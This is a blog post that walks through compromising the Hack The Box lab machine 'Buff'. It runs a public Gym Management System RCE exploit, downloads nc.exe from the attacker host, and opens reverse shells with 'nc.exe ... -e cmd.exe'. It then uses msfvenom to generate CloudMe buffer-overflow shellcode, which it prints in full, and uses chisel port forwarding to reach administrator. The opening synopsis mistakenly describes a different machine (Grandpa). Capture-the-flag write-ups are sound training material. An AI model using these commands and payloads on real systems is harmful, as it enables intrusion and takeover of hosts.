DEV Community

ikkyu
ikkyu

Posted on

【Hack the Box】Buff - Walkthrough

From the HackTheBox
Screenshot from 2021-01-14 19-23-53

SYNOPSISGrandpa is one of the simpler machines on Hack The Box, however it covers the widely-exploitedCVE-2017-7269. This vulnerability is trivial to exploit and granted immediate access to thousandsof IIS servers around the globe when it became public knowledge.

Enumeration

# Nmap 7.80 scan initiated Fri Sep 25 20:44:58 2020 as: nmap -sV -sC -Pn -oA nmap --script vuln 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.34s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.198
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.10.198:8080/
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/facilities.php
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/packages.php
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/about.php
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/contact.php
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/index.php
|     Form id: 
|_    Form action: include/process_login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:apache:http_server:2.4.43: 
|       CVE-2010-0425   10.0    https://vulners.com/cve/CVE-2010-0425
|       CVE-1999-1412   10.0    https://vulners.com/cve/CVE-1999-1412
|       CVE-1999-1237   10.0    https://vulners.com/cve/CVE-1999-1237
|       CVE-1999-0236   10.0    https://vulners.com/cve/CVE-1999-0236
|       CVE-2009-1955   7.8 https://vulners.com/cve/CVE-2009-1955
|       CVE-2007-6423   7.8 https://vulners.com/cve/CVE-2007-6423
|       CVE-2007-0086   7.8 https://vulners.com/cve/CVE-2007-0086
|       CVE-2020-11984  7.5 https://vulners.com/cve/CVE-2020-11984
|       CVE-2009-3095   7.5 https://vulners.com/cve/CVE-2009-3095
|       CVE-2007-4723   7.5 https://vulners.com/cve/CVE-2007-4723
|       CVE-2009-1891   7.1 https://vulners.com/cve/CVE-2009-1891
|       CVE-2009-1890   7.1 https://vulners.com/cve/CVE-2009-1890
|       CVE-2008-2579   6.8 https://vulners.com/cve/CVE-2008-2579
|       CVE-2007-5156   6.8 https://vulners.com/cve/CVE-2007-5156
|       CVE-2020-9490   5.0 https://vulners.com/cve/CVE-2020-9490
|       CVE-2014-0231   5.0 https://vulners.com/cve/CVE-2014-0231
|       CVE-2011-1752   5.0 https://vulners.com/cve/CVE-2011-1752
|       CVE-2010-1452   5.0 https://vulners.com/cve/CVE-2010-1452
|       CVE-2010-0408   5.0 https://vulners.com/cve/CVE-2010-0408
|       CVE-2009-2699   5.0 https://vulners.com/cve/CVE-2009-2699
|       CVE-2007-0450   5.0 https://vulners.com/cve/CVE-2007-0450
|       CVE-2005-1268   5.0 https://vulners.com/cve/CVE-2005-1268
|       CVE-2003-0020   5.0 https://vulners.com/cve/CVE-2003-0020
|       CVE-2001-1556   5.0 https://vulners.com/cve/CVE-2001-1556
|       CVE-1999-0678   5.0 https://vulners.com/cve/CVE-1999-0678
|       CVE-1999-0289   5.0 https://vulners.com/cve/CVE-1999-0289
|       CVE-1999-0070   5.0 https://vulners.com/cve/CVE-1999-0070
|       CVE-2009-1195   4.9 https://vulners.com/cve/CVE-2009-1195
|       CVE-2020-11993  4.3 https://vulners.com/cve/CVE-2020-11993
|       CVE-2011-1783   4.3 https://vulners.com/cve/CVE-2011-1783
|       CVE-2010-0434   4.3 https://vulners.com/cve/CVE-2010-0434
|       CVE-2008-2939   4.3 https://vulners.com/cve/CVE-2008-2939
|       CVE-2008-2168   4.3 https://vulners.com/cve/CVE-2008-2168
|       CVE-2008-0455   4.3 https://vulners.com/cve/CVE-2008-0455
|       CVE-2007-6420   4.3 https://vulners.com/cve/CVE-2007-6420
|       CVE-2007-6388   4.3 https://vulners.com/cve/CVE-2007-6388
|       CVE-2007-5000   4.3 https://vulners.com/cve/CVE-2007-5000
|       CVE-2007-4465   4.3 https://vulners.com/cve/CVE-2007-4465
|       CVE-2007-1349   4.3 https://vulners.com/cve/CVE-2007-1349
|       CVE-2007-6422   4.0 https://vulners.com/cve/CVE-2007-6422
|       CVE-2007-6421   3.5 https://vulners.com/cve/CVE-2007-6421
|_      CVE-2001-0131   1.2 https://vulners.com/cve/CVE-2001-0131

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 25 20:51:08 2020 -- 1 IP address (1 host up) scanned in 370.35 seconds
Enter fullscreen mode Exit fullscreen mode

I found port 8080 is open.

Screenshot from 2021-01-07 17-48-39

Local Privilege Escalation

I searched gym in metasploit and found 48506.py.

$ searchsploit gym
[i] Found (#1): /home/ikkyu/exploitdb/files_exploits.csv
[i] To remove this message, please edit "/home/ikkyu/exploitdb/.searchsploit_rc" for "files_exploits.csv" (package_array: exploitdb)

[i] Found (#1): /home/ikkyu/exploitdb/files_shellcodes.csv
[i] To remove this message, please edit "/home/ikkyu/exploitdb/.searchsploit_rc" for "files_shellcodes.csv" (package_array: exploitdb)

-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution                                                                     | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection                                                                                                | php/webapps/42801.txt
------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Enter fullscreen mode Exit fullscreen mode

I run this.

$ python ~/exploitdb/exploits/php/webapps/48506.py http://10.10.10.198:8080/

            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> 
Enter fullscreen mode Exit fullscreen mode
C:\xampp\htdocs\gym\upload> whoami
�PNG
�
buff\shaun
Enter fullscreen mode Exit fullscreen mode

Now I got the machine. Next we neet to upload nc.exe to upgrade shell.

At local machine:

$ python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Enter fullscreen mode Exit fullscreen mode

At target machine:

C:\xampp\htdocs\gym\upload> curl http://10.10.14.6:8000/nc.exe -o nc.exe
�PNG
�
Enter fullscreen mode Exit fullscreen mode
C:\xampp\htdocs\gym\upload> dir
�PNG
�
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\xampp\htdocs\gym\upload

22/12/2020  12:04    <DIR>          .
22/12/2020  12:04    <DIR>          ..
22/12/2020  12:04                53 kamehameha.php
22/12/2020  11:40            38,616 nc.exe
               2 File(s)         38,669 bytes
               2 Dir(s)   7,315,296,256 bytes free
Enter fullscreen mode Exit fullscreen mode

I succeeded in uploading.
Now we can get a reverse shell.

At local machine:

rlwrap nc -lvnp 4444
Listening on 0.0.0.0 4444
Enter fullscreen mode Exit fullscreen mode

At target machine:

C:\xampp\htdocs\gym\upload> nc.exe 10.10.14.6 4444 -e cmd.exe
Enter fullscreen mode Exit fullscreen mode

At local machine:

rlwrap nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.10.198 49682
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload>
Enter fullscreen mode Exit fullscreen mode

I got a reverse shell.

Administrator Privilege Escalation

I checked process.

C:\xampp\htdocs\gym\upload>tasklist
tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0          8 K
System                           4                            0         44 K
Registry                       104                            0      7,392 K
smss.exe                       368                            0        384 K
csrss.exe                      456                            0      3,856 K
wininit.exe                    532                            0      4,608 K
csrss.exe                      540                            1      3,452 K
winlogon.exe                   604                            1      8,888 K
services.exe                   676                            0      8,296 K
lsass.exe                      696                            0     12,072 K
svchost.exe                    812                            0      2,520 K
fontdrvhost.exe                836                            0     13,900 K
fontdrvhost.exe                844                            1      8,100 K
svchost.exe                    860                            0     22,724 K
svchost.exe                    956                            0     12,036 K
svchost.exe                   1004                            0      6,028 K
dwm.exe                        328                            1     41,676 K
svchost.exe                    360                            0      8,292 K
svchost.exe                    948                            0      7,100 K
svchost.exe                    996                            0      9,664 K
svchost.exe                   1076                            0     18,084 K
svchost.exe                   1136                            0     18,504 K
svchost.exe                   1208                            0      5,984 K
svchost.exe                   1280                            0      5,680 K
svchost.exe                   1380                            0      8,672 K
svchost.exe                   1388                            0     10,612 K
svchost.exe                   1408                            0      4,044 K
svchost.exe                   1416                            0      7,352 K
svchost.exe                   1516                            0      9,604 K
svchost.exe                   1552                            0     12,944 K
Memory Compression            1564                            0     30,132 K
svchost.exe                   1592                            0      7,004 K
svchost.exe                   1676                            0      6,028 K
svchost.exe                   1772                            0      5,036 K
svchost.exe                   1780                            0      5,792 K
svchost.exe                   1824                            0      6,956 K
svchost.exe                   1880                            0      8,588 K
svchost.exe                   1988                            0      6,180 K
svchost.exe                   1456                            0      6,364 K
svchost.exe                   1336                            0      7,044 K
svchost.exe                   1240                            0      4,432 K
svchost.exe                   2060                            0      7,564 K
svchost.exe                   2132                            0      9,108 K
svchost.exe                   2284                            0      5,600 K
spoolsv.exe                   2300                            0     12,040 K
svchost.exe                   2424                            0      6,124 K
svchost.exe                   2736                            0      7,660 K
svchost.exe                   2748                            0     14,036 K
svchost.exe                   2760                            0     19,308 K
svchost.exe                   2768                            0      3,696 K
svchost.exe                   2756                            0      4,532 K
vmtoolsd.exe                  2788                            0     18,696 K
svchost.exe                   2796                            0     13,656 K
svchost.exe                   2804                            0     15,532 K
SecurityHealthService.exe     2832                            0     13,048 K
MsMpEng.exe                   2864                            0    169,640 K
VGAuthService.exe             2880                            0      7,840 K
svchost.exe                   2980                            0      7,080 K
svchost.exe                   2052                            0      9,868 K
svchost.exe                   3104                            0      9,768 K
svchost.exe                   3144                            0      3,568 K
dllhost.exe                   3660                            0     11,308 K
WmiPrvSE.exe                  3848                            0     14,188 K
msdtc.exe                     2720                            0      8,132 K
svchost.exe                   4540                            0     30,464 K
sihost.exe                    4596                            1     21,576 K
svchost.exe                   4620                            1     11,716 K
svchost.exe                   4672                            1     24,212 K
taskhostw.exe                 4768                            1      9,896 K
svchost.exe                   4932                            0      5,548 K
ctfmon.exe                    4992                            1     10,796 K
svchost.exe                   5080                            0      5,848 K
svchost.exe                   5092                            0     11,500 K
NisSrv.exe                    5212                            0      7,268 K
WmiPrvSE.exe                  5276                            0     18,888 K
explorer.exe                  5716                            1     79,172 K
svchost.exe                   5776                            0     16,212 K
svchost.exe                   5796                            0     11,372 K
svchost.exe                   5960                            0      5,312 K
svchost.exe                   6000                            0     12,380 K
svchost.exe                   5444                            0      4,852 K
svchost.exe                   4416                            0      4,976 K
ShellExperienceHost.exe       1048                            1     51,772 K
SearchUI.exe                  6360                            1    118,800 K
RuntimeBroker.exe             6588                            1     16,452 K
ApplicationFrameHost.exe      6780                            1     26,996 K
MicrosoftEdge.exe             7072                            1     55,284 K
browser_broker.exe            7160                            1      6,876 K
svchost.exe                   6316                            0      4,668 K
Windows.WARP.JITService.e     4404                            0      3,380 K
RuntimeBroker.exe             4356                            1      5,012 K
MicrosoftEdgeCP.exe           4220                            1     18,920 K
RuntimeBroker.exe             4464                            1     13,908 K
MicrosoftEdgeCP.exe           2672                            1     21,300 K
svchost.exe                   7332                            0     11,264 K
conhost.exe                   7464                            0      1,008 K
SearchIndexer.exe             8140                            0     23,680 K
MSASCuiL.exe                  7424                            1      6,812 K
vmtoolsd.exe                  5748                            1     13,220 K
httpd.exe                     1712                            0        460 K
mysqld.exe                    7716                            0      3,480 K
svchost.exe                   2572                            0      3,636 K
svchost.exe                   5304                            1     14,224 K
httpd.exe                     1460                            0      9,188 K
svchost.exe                   6552                            0     12,824 K
SgrmBroker.exe                2296                            0      2,704 K
svchost.exe                   8248                            0      6,984 K
CompatTelRunner.exe           1104                            0        632 K
conhost.exe                   8608                            0      1,216 K
svchost.exe                   7788                            0      8,192 K
Microsoft.Photos.exe          2528                            1      5,240 K
RuntimeBroker.exe             3856                            1     12,252 K
WinStore.App.exe              8424                            1     26,440 K
RuntimeBroker.exe             4556                            1      5,240 K
SystemSettings.exe            7764                            1     32,228 K
svchost.exe                   5984                            0      4,748 K
svchost.exe                   7484                            0      9,652 K
taskhostw.exe                 5920                            1     20,872 K
taskhostw.exe                 3520                            0     23,440 K
CompatTelRunner.exe           1548                            0      2,428 K
conhost.exe                   8792                            0      9,736 K
TrustedInstaller.exe          1016                            0      5,524 K
svchost.exe                    196                            0      5,352 K
TiWorker.exe                  2148                            0    103,996 K
svchost.exe                   8784                            0      7,844 K
svchost.exe                   6488                            0      3,792 K
svchost.exe                   8596                            0     11,860 K
cmd.exe                       7204                            0      2,432 K
conhost.exe                   9176                            0      9,132 K
nc.exe                        7192                            0      5,436 K
cmd.exe                       4504                            0      3,988 K
cmd.exe                        708                            0      3,208 K
conhost.exe                   2452                            0     10,868 K
CloudMe.exe                   3496                            0     26,884 K
timeout.exe                   5968                            0      3,920 K
tasklist.exe                  8796                            0      7,772 K
Enter fullscreen mode Exit fullscreen mode

I found CloudMe.exe. CloudMe is known to be vulnerable. I searched cloudme in metasploit.

$ searchsploit cloudme

--------------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
--------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)        | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASL | win
ws/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASL | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasplo | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(D | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Over | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow   | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghu | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 ( | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow       | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) | windows_x86-64/remote/44784.py
--------------------------------------------------- ---------------------------------
Shellcodes: No Results
Enter fullscreen mode Exit fullscreen mode

I found 48389.py. I searched about this on exploit-db.

Screenshot from 2021-01-14 21-13-46

Now we need to modify this code a bit and remote port forwarding on the target machine.You can see from the exploit-db that the default is to launch the calculator.

I created payload. Here, the port is set to 4445, but it can be anything.

$ msfvenom -a x86 -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.28 4445 -e cmd.exe' -b '\x00\x0A\x0D' -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 273 (iteration=0)
x86/shikata_ga_nai chosen with final size 273
Payload size: 273 bytes
Final size of python file: 1452 bytes
payload =  b""
payload += b"\xda\xcf\xd9\x74\x24\xf4\xbe\xe3\xce\xa2\x54\x5a"
payload += b"\x29\xc9\xb1\x3e\x31\x72\x19\x83\xea\xfc\x03\x72"
payload += b"\x15\x01\x3b\x5e\xbc\x47\xc4\x9f\x3d\x27\x4c\x7a"
payload += b"\x0c\x67\x2a\x0e\x3f\x57\x38\x42\xcc\x1c\x6c\x77"
payload += b"\x47\x50\xb9\x78\xe0\xde\x9f\xb7\xf1\x72\xe3\xd6"
payload += b"\x71\x88\x30\x39\x4b\x43\x45\x38\x8c\xb9\xa4\x68"
payload += b"\x45\xb6\x1b\x9d\xe2\x82\xa7\x16\xb8\x03\xa0\xcb"
payload += b"\x09\x22\x81\x5d\x01\x7d\x01\x5f\xc6\xf6\x08\x47"
payload += b"\x0b\x32\xc2\xfc\xff\xc9\xd5\xd4\x31\x32\x79\x19"
payload += b"\xfe\xc1\x83\x5d\x39\x39\xf6\x97\x39\xc4\x01\x6c"
payload += b"\x43\x12\x87\x77\xe3\xd1\x3f\x5c\x15\x36\xd9\x17"
payload += b"\x19\xf3\xad\x70\x3e\x02\x61\x0b\x3a\x8f\x84\xdc"
payload += b"\xca\xcb\xa2\xf8\x97\x88\xcb\x59\x72\x7f\xf3\xba"
payload += b"\xdd\x20\x51\xb0\xf0\x35\xe8\x9b\x9e\xc8\x7e\xa6"
payload += b"\xed\xca\x80\xa9\x41\xa2\xb1\x22\x0e\xb5\x4d\xe1"
payload += b"\x6a\x49\x04\xa8\xdb\xc1\xc1\x38\x5e\x8c\xf1\x96"
payload += b"\x9d\xa8\x71\x13\x5e\x4f\x69\x56\x5b\x14\x2d\x8a"
payload += b"\x11\x05\xd8\xac\x86\x26\xc9\xee\x12\x84\x8a\x91"
payload += b"\x0f\x44\x1b\x0e\xb8\xd0\xbf\xc1\x5b\x6b\x1c\x79"
payload += b"\xe5\xe6\xc0\xf0\x65\x94\x97\x9b\xe1\x38\x06\x3f"
payload += b"\xc4\xa5\xae\xda\x38\x14\x7f\x0b\x08\x66\x51\x62"
payload += b"\x5e\xa8\x9f\xbc\xbe\x80\xeb\x88\x8b\xc8\x3e\x94"
payload += b"\xd3\x6b\x2c\x32\x3a\x0e\xd6\xdf\x42"
Enter fullscreen mode Exit fullscreen mode

Replace the payload part of 48389.py.
Next, we need to upload chisel.exe to remote port forwarding as before. After uploading,at local machine:

$ chisel server -p 1234 -reverse -v
2021/01/07 17:33:38 server: Reverse tunnelling enabled
2021/01/07 17:33:38 server: Fingerprint Wf5cpZzaVbfNXiWNsUT8AEcLYgEeOI7r3U440nagv08=
2021/01/07 17:33:38 server: Listening on http://0.0.0.0:1234
Enter fullscreen mode Exit fullscreen mode

At target machine:

C:\xampp\htdocs\gym\upload>chisel.exe client -v 10.10.14.28:1234 R:8888:127.0.0.1:8888 --keepalive:1000
chisel.exe client -v 10.10.14.28:1234 R:8888:127.0.0.1:8888 --keepalive:1000
2021/01/07 07:31:30 client: Connecting to ws://10.10.14.28:1234
2021/01/07 07:31:30 client: tun: proxy#1000=>--keepalive:1000: Listening
2021/01/07 07:31:30 client: tun: Bound proxies
2021/01/07 07:31:31 client: Handshaking...
2021/01/07 07:31:33 client: Sending config
2021/01/07 07:31:33 client: Connected (Latency 336.4421ms)
2021/01/07 07:31:33 client: tun: SSH connected
Enter fullscreen mode Exit fullscreen mode

Now start a netcat listener on 4445 and execute the pyload on the second terminal.

$ nc -lnvp 4445
Listening on 0.0.0.0 4445

Connection received on 10.10.10.198 49686
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator
Enter fullscreen mode Exit fullscreen mode

We got the admin.

Image of Timescale

Timescale – the developer's data platform for modern apps, built on PostgreSQL

Timescale Cloud is PostgreSQL optimized for speed, scale, and performance. Over 3 million IoT, AI, crypto, and dev tool apps are powered by Timescale. Try it free today! No credit card required.

Try free

Top comments (1)

Collapse
 
marcellothearcane profile image
marcellothearcane

Ouch! How do you mitigate?

AWS Security LIVE!

Tune in for AWS Security LIVE!

Join AWS Security LIVE! for expert insights and actionable tips to protect your organization and keep security teams prepared.

Learn More

👋 Kindness is contagious

Dive into an ocean of knowledge with this thought-provoking post, revered deeply within the supportive DEV Community. Developers of all levels are welcome to join and enhance our collective intelligence.

Saying a simple "thank you" can brighten someone's day. Share your gratitude in the comments below!

On DEV, sharing ideas eases our path and fortifies our community connections. Found this helpful? Sending a quick thanks to the author can be profoundly valued.

Okay